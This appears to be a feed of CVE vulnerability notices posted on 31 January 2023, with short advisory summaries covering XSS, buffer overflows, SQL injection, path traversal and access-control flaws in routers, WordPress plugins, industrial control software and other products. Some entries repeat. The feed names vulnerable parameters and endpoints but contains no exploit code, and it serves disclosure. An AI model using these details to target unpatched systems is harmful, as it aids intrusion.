🚨 CVE-2020-16242The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow an attacker to trick application users into performing critical application actions that include, but are not limited to, adding and updating accounts.🎖@cveNotify |
|
| 2023-01-31 23:29:51 |
🚨 CVE-2019-4299IBM Robotic Process Automation with Automation Anywhere 11 could allow a local user to obtain highly sensitive information from log files when debugging is enabled. IBM X-Force ID: 160765.🎖@cveNotify |
|
| 2023-01-31 23:29:50 |
🚨 CVE-2019-4310IBM Security Guardium Big Data Intelligence 4.0 (SonarG) uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 161036.🎖@cveNotify |
|
| 2023-01-31 23:29:48 |
🚨 CVE-2019-4308IBM Emptoris Sourcing 10.1.0 through 10.1.3, IBM Contract Management 10.1.0 through 10.1.3, and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 could allow an authenticated user to obtain sensitive information from error messages IBM X-Force ID: 161034.🎖@cveNotify |
|
| 2023-01-31 23:29:44 |
🚨 CVE-2019-5458Cross-site scripting (XSS) vulnerability in http-file-server (all versions) allows an attacker with access to the server file system to execute arbitrary JavaScript code in victim's browser.🎖@cveNotify |
|
| 2023-01-31 23:29:43 |
🚨 CVE-2019-4419IBM Intelligent Operations Center V5.1.0 through V5.2.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 162737.🎖@cveNotify |
|
| 2023-01-31 23:29:42 |
🚨 CVE-2020-6574Insufficient policy enforcement in installer in Google Chrome on OS X prior to 85.0.4183.102 allowed a local attacker to potentially achieve privilege escalation via a crafted binary.🎖@cveNotify |
|
| 2023-01-31 23:29:41 |
🚨 CVE-2020-25739An issue was discovered in the gon gem before gon-6.4.0 for Ruby. MultiJson does not honor the escape_mode parameter to escape fields as an XSS protection mechanism. To mitigate, json_dumper.rb in gon now does escaping for XSS by default without relying on MultiJson.🎖@cveNotify |
|
| 2023-01-31 22:29:59 |
🚨 CVE-2018-3914An exploitable stack-based buffer overflow vulnerability exists in the retrieval of database fields in the video-core HTTP server of the Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The strcpy call overflows the destination buffer, which has a size of 2000 bytes. An attacker can send an arbitrarily long "sessionToken" value in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-01-31 22:29:58 |
🚨 CVE-2019-20387repodata_schema2id in repodata.c in libsolv before 0.7.6 has a heap-based buffer over-read via a last schema whose length is less than the length of the input schema.🎖@cveNotify |
|
| 2023-01-31 22:29:57 |
🚨 CVE-2019-14834A vulnerability was found in dnsmasq before version 2.81, where the memory leak allows remote attackers to cause a denial of service (memory consumption) via vectors involving DHCP response creation.🎖@cveNotify |
|
| 2023-01-31 22:29:55 |
🚨 CVE-2019-19585An issue was discovered in rConfig 3.9.3. The install script updates the /etc/sudoers file for rconfig specific tasks. After an "rConfig specific Apache configuration" update, apache has high privileges for some binaries. This can be exploited by an attacker to bypass local security restrictions.🎖@cveNotify |
|
| 2023-01-31 22:29:54 |
🚨 CVE-2019-19509An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution.🎖@cveNotify |
|
| 2023-01-31 22:29:53 |
🚨 CVE-2016-15023A vulnerability, which was classified as problematic, was found in SiteFusion Application Server up to 6.6.6. This affects an unknown part of the file getextension.php of the component Extension Handler. The manipulation leads to path traversal. Upgrading to version 6.6.7 is able to address this issue. The name of the patch is 49fff155c303d6cd06ce8f97bba56c9084bf08ac. It is recommended to upgrade the affected component. The identifier VDB-219765 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-31 22:29:52 |
🚨 CVE-2022-47697COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts.🎖@cveNotify |
|
| 2023-01-31 22:29:51 |
🚨 CVE-2022-47698COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Cross Site Scripting (XSS) via the URL filtering feature in the router.🎖@cveNotify |
|
| 2023-01-31 22:29:50 |
🚨 CVE-2022-47699COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Incorrect Access Control.🎖@cveNotify |
|
| 2023-01-31 22:29:49 |
🚨 CVE-2022-47700COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Incorrect Access Control. Improper authentication allows requests to be made to back-end scripts without a valid session or authentication.🎖@cveNotify |
|
| 2023-01-31 22:29:47 |
🚨 CVE-2022-47701COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-01-31 22:29:46 |
🚨 CVE-2022-47854i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.🎖@cveNotify |
|
| 2023-01-31 22:29:45 |
🚨 CVE-2022-45172An issue was discovered in LIVEBOX Collaboration vDesk before v018. Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the system.🎖@cveNotify |
|
| 2023-01-31 22:29:44 |
🚨 CVE-2019-14322In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.🎖@cveNotify |
|
| 2023-01-31 22:29:43 |
🚨 CVE-2022-34666NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2023-01-31 22:29:42 |
🚨 CVE-2022-45149A vulnerability was found in Moodle which exists due to insufficient validation of the HTTP request origin in course redirect URL. A user's CSRF token was unnecessarily included in the URL when being redirected to a course they have just restored. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website. This flaw allows an attacker to perform cross-site request forgery attacks.🎖@cveNotify |
|
| 2023-01-31 22:29:41 |
🚨 CVE-2022-43428Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process.🎖@cveNotify |
|
| 2023-01-31 22:29:40 |
🚨 CVE-2018-3849In the ffghtb function in NASA CFITSIO 3.42, specially crafted images parsed via the library can cause a stack-based buffer overflow overwriting arbitrary data. An attacker can deliver an FIT image to trigger this vulnerability and potentially gain code execution.🎖@cveNotify |
|
| 2023-01-31 22:29:39 |
🚨 CVE-2018-3850An exploitable use-after-free vulnerability exists in the JavaScript engine Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If a browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.🎖@cveNotify |
|
| 2023-01-31 22:29:38 |
🚨 CVE-2018-1000413A cross-site scripting vulnerability exists in Jenkins Config File Provider Plugin 3.1 and earlier in configfiles.jelly, providerlist.jelly that allows users with the ability to configure configuration files to insert arbitrary HTML into some pages in Jenkins.🎖@cveNotify |
|
| 2023-01-31 20:30:09 |
🚨 CVE-2016-4279Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-6921, CVE-2016-6923, CVE-2016-6925, CVE-2016-6926, CVE-2016-6927, CVE-2016-6929, CVE-2016-6930, CVE-2016-6931, and CVE-2016-6932.🎖@cveNotify |
|
| 2023-01-31 20:30:08 |
🚨 CVE-2022-0316The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.🎖@cveNotify |
|
| 2023-01-31 20:30:06 |
🚨 CVE-2023-22610A CWE-285: Improper Authorization vulnerability exists that could cause Denial of Service against the Geo SCADA server when specific messages are sent to the server over the database server TCP port. Affected Products: EcoStruxure™ Geo SCADA Expert 2019, EcoStruxure™ Geo SCADA Expert 2020, EcoStruxure™ Geo SCADA Expert 2021 (All versions prior to October 2022), ClearSCADA (All Versions).🎖@cveNotify |
|
| 2023-01-31 20:30:04 |
🚨 CVE-2022-47697COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts.🎖@cveNotify |
|
| 2023-01-31 20:30:03 |
🚨 CVE-2022-47698COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Cross Site Scripting (XSS) via the URL filtering feature in the router.🎖@cveNotify |
|
| 2023-01-31 20:30:01 |
🚨 CVE-2022-47699COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Incorrect Access Control.🎖@cveNotify |
|
| 2023-01-31 20:30:00 |
🚨 CVE-2022-47700COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Incorrect Access Control. Improper authentication allows requests to be made to back-end scripts without a valid session or authentication.🎖@cveNotify |
|
| 2023-01-31 20:29:58 |
🚨 CVE-2022-47701COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-01-31 20:29:57 |
🚨 CVE-2022-47854i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.🎖@cveNotify |
|
| 2023-01-31 20:29:55 |
🚨 CVE-2022-45172An issue was discovered in LIVEBOX Collaboration vDesk before v018. Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the system.🎖@cveNotify |
|
| 2023-01-31 20:29:53 |
🚨 CVE-2023-24058Booked Scheduler 2.5.5 allows authenticated users to create and schedule events for any other user via a modified userId value to reservation_save.php. NOTE: 2.5.5 is a version from 2014; the latest version of Booked Scheduler is not affected. However, LabArchives Scheduler (Sep 6, 2022 Feature Release) is affected.🎖@cveNotify |
|
| 2023-01-31 20:29:52 |
🚨 CVE-2022-40259MegaRAC Default Credentials Vulnerability🎖@cveNotify |
|
| 2023-01-31 20:29:51 |
🚨 CVE-2022-41674An issue was discovered in the Linux kernel before 5.19.16. Attackers able to inject WLAN frames could cause a buffer overflow in the ieee80211_bss_info_update function in net/mac80211/scan.c.🎖@cveNotify |
|
| 2023-01-31 20:29:49 |
🚨 CVE-2022-42720Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code.🎖@cveNotify |
|
| 2023-01-31 20:29:47 |
🚨 CVE-2022-42721A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code.🎖@cveNotify |
|
| 2023-01-31 20:29:46 |
🚨 CVE-2022-42722In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices.🎖@cveNotify |
|
| 2023-01-31 20:29:44 |
🚨 CVE-2022-24423Dell iDRAC8 versions prior to 2.83.83.83 contain a denial of service vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to cause resource exhaustion in the webserver, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-01-31 20:29:43 |
🚨 CVE-2022-22187An Improper Privilege Management vulnerability in the Windows Installer framework used in the Juniper Networks Juniper Identity Management Service (JIMS) allows an unprivileged user to trigger a repair operation. Running a repair operation, in turn, will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files. An attacker may be able to provide malicious binaries to the Windows Installer, which will be executed with high privilege, leading to a local privilege escalation. This issue affects Juniper Networks Juniper Identity Management Service (JIMS) versions prior to 1.4.0.🎖@cveNotify |
|
| 2023-01-31 20:29:42 |
🚨 CVE-2022-0388The Interactive Medical Drawing of Human Body WordPress plugin before 2.6 does not sanitise and escape the Link field, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-01-31 20:29:41 |
🚨 CVE-2022-24303Pillow before 9.0.1 allows attackers to delete files because spaces in temporary pathnames are mishandled.🎖@cveNotify |
|
| 2023-01-31 18:30:05 |
🚨 CVE-2022-24963Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0.🎖@cveNotify |
|
| 2023-01-31 18:30:04 |
🚨 CVE-2022-28331On Windows, Apache Portable Runtime 1.7.0 and earlier may write beyond the end of a stack based buffer in apr_socket_sendv(). This is a result of integer overflow.🎖@cveNotify |
|
| 2023-01-31 18:30:03 |
🚨 CVE-2022-45598Cross Site Scripting vulnerability in Joplin Desktop App before v2.9.17 allows attacker to execute arbitrary code via improper santization.🎖@cveNotify |
|
| 2023-01-31 18:30:02 |
🚨 CVE-2022-47035Buffer Overflow Vulnerability in D-Link DIR-825 v1.33.0.44ebdd4-embedded and below allows attacker to execute arbitrary code via the GetConfig method to the /CPE endpoint.🎖@cveNotify |
|
| 2023-01-31 18:30:01 |
🚨 CVE-2022-47780SQL Injection vulnerability in Bangresto 1.0 via the itemID parameter.🎖@cveNotify |
|
| 2023-01-31 18:29:57 |
🚨 CVE-2023-24162Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter.🎖@cveNotify |
|
| 2023-01-31 18:29:56 |
🚨 CVE-2023-24163SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine.🎖@cveNotify |
|
| 2023-01-31 18:29:55 |
🚨 CVE-2022-45639OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands via a crafted value to the m parameter.🎖@cveNotify |
|
| 2023-01-31 18:29:54 |
🚨 CVE-2022-4554B2B Customer Ordering System developed by ID Software Project and Consultancy Services before version 1.0.0.347 has an authenticated Reflected XSS vulnerability. This has been fixed in the version 1.0.0.347.🎖@cveNotify |
|
| 2023-01-31 18:29:53 |
🚨 CVE-2023-24055** DISPUTED ** KeePass through 2.53 (in a default installation) allows an attacker, who has write access to the XML configuration file, to obtain the cleartext passwords by adding an export trigger. NOTE: the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.🎖@cveNotify |
|
| 2023-01-31 18:29:49 |
🚨 CVE-2021-43446ONLYOFFICE all versions as of 2021-11-08 is vulnerable to Cross Site Scripting (XSS). The "macros" feature of the document editor allows malicious cross site scripting payloads to be used.🎖@cveNotify |
|
| 2023-01-31 18:29:48 |
🚨 CVE-2022-45435IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p2, IdentityIQ 8.2 and all 8.2 patch levels prior to 8.2p5, IdentityIQ 8.1 and all 8.1 patch levels prior to 8.1p7, IdentityIQ 8.0 and all 8.0 patch levels prior to 8.0p6, and all prior versions allow authenticated users assigned the Identity Administrator capability or any custom capability that contains the SetIdentityForwarding right to modify the work item forwarding configuration for identities other than the ones that should be allowed by Lifecycle Manager Quicklink Population configuration.🎖@cveNotify |
|
| 2023-01-31 18:29:47 |
🚨 CVE-2022-46835IdentitylQ 8.3 and all 8.3 patch levels prior to 8.3p2, IdentitylQ 8.2 and all 8.2 patch levels prior to 8.2p5, IdentitylQ 8.1 and all 8.1 patch levels prior to 8.1p7, Identity|Q 8.0 and all 8.0 patch levels prior to 8.0p6 allow access to arbitrary files in the application server filesystem due to a path traversal vulnerability in JavaServer Faces (JSF) 2.2.20 documented in CVE-2020-6950.🎖@cveNotify |
|
| 2023-01-31 18:29:46 |
🚨 CVE-2022-4746The FluentAuth WordPress plugin before 1.0.2 prioritizes getting a visitor's IP address from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass the IP-based blocks set by the plugin.🎖@cveNotify |
|
| 2023-01-31 18:29:45 |
🚨 CVE-2022-4716The WP Popups WordPress plugin before 2.1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 18:29:41 |
🚨 CVE-2022-4718The Landing Page Builder WordPress plugin before 1.4.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 18:29:40 |
🚨 CVE-2022-4672The WordPress Simple Shopping Cart WordPress plugin before 4.6.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 18:29:39 |
🚨 CVE-2021-36539Instructure Canvas LMS didn't properly deny access to locked/unpublished files when the unprivileged user access the DocViewer based file preview URL (canvadoc_session_url).🎖@cveNotify |
|
| 2023-01-31 18:29:38 |
🚨 CVE-2021-43444ONLYOFFICE all versions as of 2021-11-08 is affected by Incorrect Access Control. Signed document download URLs can be forged due to a weak default URL signing key.🎖@cveNotify |
|
| 2023-01-31 18:29:37 |
🚨 CVE-2021-43445ONLYOFFICE all versions as of 2021-11-08 is affected by Incorrect Access Control. An attacker can authenticate with the web socket service of the ONLYOFFICE document editor which is protected by JWT auth by using a default JWT signing key.🎖@cveNotify |
|
| 2023-01-31 16:29:41 |
🚨 CVE-2022-4570The Top 10 WordPress plugin before 3.2.3 does not validate and escape some of its Block attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 16:29:40 |
🚨 CVE-2023-24056In pkgconf through 1.9.3, variable duplication can cause unbounded string expansion due to incorrect checks in libpkgconf/tuple.c:pkgconf_tuple_parse. For example, a .pc file containing a few hundred bytes can expand to one billion bytes.🎖@cveNotify |
|
| 2023-01-31 12:29:46 |
🚨 CVE-2022-38756A vulnerability has been identified in Micro Focus GroupWise Web in versions prior to 18.4.2. The GW Web component makes a request to the Post Office Agent that contains sensitive information in the query parameters that could be logged by any intervening HTTP proxies.🎖@cveNotify |
|
| 2023-01-31 12:29:45 |
🚨 CVE-2022-39059ChangingTech MegaServiSignAdapter component has a path traversal vulnerability within its file reading function. An unauthenticated remote attacker can exploit this vulnerability to access arbitrary system files.🎖@cveNotify |
|
| 2023-01-31 12:29:44 |
🚨 CVE-2022-39060ChangingTech MegaServiSignAdapter component has a vulnerability of improper input validation. An unauthenticated remote attacker can exploit this vulnerability to access and modify HKEY_CURRENT_USER subkey (ex: AutoRUN) in Registry where malicious scripts can be executed to take control of the system or to terminate the service.🎖@cveNotify |
|
| 2023-01-31 12:29:41 |
🚨 CVE-2022-39061ChangingTech MegaServiSignAdapter component has a vulnerability of Out-of-bounds Read due to insufficient validation for parameter length. An unauthenticated remote attacker can exploit this vulnerability to access partial sensitive content in memory and disrupts partial services.🎖@cveNotify |
|
| 2023-01-31 12:29:40 |
🚨 CVE-2023-22900Efence login function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify or delete database.🎖@cveNotify |
|
| 2023-01-31 12:29:38 |
🚨 CVE-2022-45789A CWE-294: Authentication Bypass by Capture-replay vulnerability exists that could cause execution of unauthorized Modbus functions on the controller when hijacking an authenticated Modbus session. Affected Products: EcoStruxure™ Control Expert (All Versions), EcoStruxure™ Process Expert (Version V2020 & prior), Modicon M340 CPU (part numbers BMXP34*) (All Versions), Modicon M580 CPU (part numbers BMEP* and BMEH*) (All Versions), Modicon M580 CPU Safety (part numbers BMEP58*S and BMEH58*S) (All Versions)🎖@cveNotify |
|
| 2023-01-31 02:30:01 |
🚨 CVE-2022-32522A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted mathematically reduced data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:30:00 |
🚨 CVE-2022-32524A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted time reduced data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:29:59 |
🚨 CVE-2022-32525A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted alarm data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:29:57 |
🚨 CVE-2022-0223A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could allow an attacker to create or overwrite critical files that are used to execute code, such as programs or libraries and cause unauthenticated code execution. Affected Products: EcoStruxure Power Commission (Versions prior to V2.22)🎖@cveNotify |
|
| 2023-01-31 02:29:56 |
🚨 CVE-2022-32526A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted setting value messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:29:55 |
🚨 CVE-2022-22731A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists in a function that could allow an attacker to create or overwrite critical files that are used to execute code, such as programs or libraries and cause path traversal attacks. Affected Products: EcoStruxure Power Commission (Versions prior to V2.22)🎖@cveNotify |
|
| 2023-01-31 02:29:54 |
🚨 CVE-2022-32527A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted alarm cache data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:29:53 |
🚨 CVE-2022-22732A CWE-668: Exposure of Resource to Wrong Sphere vulnerability exists that could cause all remote domains to access the resources (data) supplied by the server when an attacker sends a fetch request from third-party site or malicious site. Affected Products: EcoStruxure Power Commission (Versions prior to V2.22)🎖@cveNotify |
|
| 2023-01-31 02:29:52 |
🚨 CVE-2022-32528A CWE-306: Missing Authentication for Critical Function vulnerability exists that could cause access to manipulate and read files in the IGSS project report directory when an attacker sends specific messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:29:51 |
🚨 CVE-2022-32529A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted log data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 02:29:46 |
🚨 CVE-2022-32512A CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists that could cause remote code execution when a command which exploits this vulnerability is utilized. Affected Products: CanBRASS (Versions prior to V7.5.1)🎖@cveNotify |
|
| 2023-01-31 02:29:45 |
🚨 CVE-2022-32748A CWE-295: Improper Certificate Validation vulnerability exists that could cause the CAE software to give wrong data to end users when using CAE to configure devices. Additionally, credentials could leak which would enable an attacker the ability to log into the configuration tool and compromise other devices in the network. Affected Products: EcoStruxure™ Cybersecurity Admin Expert (CAE) (Versions prior to 2.2)🎖@cveNotify |
|
| 2023-01-31 02:29:44 |
🚨 CVE-2022-32514A CWE-287: Improper Authentication vulnerability exists that could allow an attacker to gain control of the device when logging into a web page. Affected Products: C-Bus Network Automation Controller - LSS5500NAC (Versions prior to V1.10.0), Wiser for C-Bus Automation Controller - LSS5500SHAC (Versions prior to V1.10.0), Clipsal C-Bus Network Automation Controller - 5500NAC (Versions prior to V1.10.0), Clipsal Wiser for C-Bus Automation Controller - 5500SHAC (Versions prior to V1.10.0), SpaceLogic C-Bus Network Automation Controller - 5500NAC2 (Versions prior to V1.10.0), SpaceLogic C-Bus Application Controller - 5500AC2 (Versions prior to V1.10.0)🎖@cveNotify |
|
| 2023-01-31 02:29:43 |
🚨 CVE-2022-48175Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.🎖@cveNotify |
|
| 2023-01-31 02:29:39 |
🚨 CVE-2022-32517A CWE-1021: Improper Restriction of Rendered UI Layers or Frames vulnerability exists that could cause an adversary to trick the interface user/admin into interacting with the application in an unintended way when the product does not implement restrictions on the ability to render within frames on external addresses. Affected Products: Conext™ ComBox (All Versions)🎖@cveNotify |
|
| 2023-01-31 02:29:38 |
🚨 CVE-2023-22389Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior store passwords in a plaintext file when the device configuration is exported via Save/Restore–>Backup Settings, which could be read by any user accessing the file.🎖@cveNotify |
|
| 2023-01-31 02:29:37 |
🚨 CVE-2022-32518A CWE-522: Insufficiently Protected Credentials vulnerability exists that could result in unwanted access to a DCE instance when performed over a network by a malicious third-party. This CVE is unique from CVE-2022-32520. Affected Products: Data Center Expert (Versions prior to V7.9.0)🎖@cveNotify |
|
| 2023-01-31 02:29:36 |
🚨 CVE-2022-32523A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted online data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-01-31 00:30:05 |
🚨 CVE-2022-36227In libarchive before 3.6.2, the software does not check for an error after calling calloc function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference. NOTE: the discoverer cites this CWE-476 remark but third parties dispute the code-execution impact: "In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."🎖@cveNotify |
|
| 2023-01-31 00:30:04 |
🚨 CVE-2023-20057A vulnerability in the URL filtering mechanism of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass the URL reputation filters on an affected device. This vulnerability is due to improper processing of URLs. An attacker could exploit this vulnerability by crafting a URL in a particular way. A successful exploit could allow the attacker to bypass the URL reputation filters that are configured for an affected device, which could allow malicious URLs to pass through the device.🎖@cveNotify |
|
| 2023-01-31 00:30:03 |
🚨 CVE-2022-4496The SAML SSO Standard WordPress plugin version 16.0.0 before 16.0.8, SAML SSO Premium WordPress plugin version 12.0.0 before 12.1.0 and SAML SSO Premium Multisite WordPress plugin version 20.0.0 before 20.0.7 does not validate that the redirect parameter to its SSO login endpoint points to an internal site URL, making it vulnerable to an Open Redirect issue when the user is already logged in.🎖@cveNotify |
|
| 2023-01-31 00:30:02 |
🚨 CVE-2022-4472The Simple Sitemap WordPress plugin before 3.5.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:30:01 |
🚨 CVE-2022-4699The MediaElement.js WordPress plugin through 4.2.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high-privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:57 |
🚨 CVE-2022-4776The CC Child Pages WordPress plugin before 1.43 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:56 |
🚨 CVE-2022-4651The Justified Gallery WordPress plugin before 1.7.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-01-31 00:29:55 |
🚨 CVE-2022-4793The Blog Designer WordPress plugin before 2.4.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-01-31 00:29:54 |
🚨 CVE-2022-4667The RSS Aggregator by Feedzy WordPress plugin before 4.1.1 does not validate and escape some of its block options before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
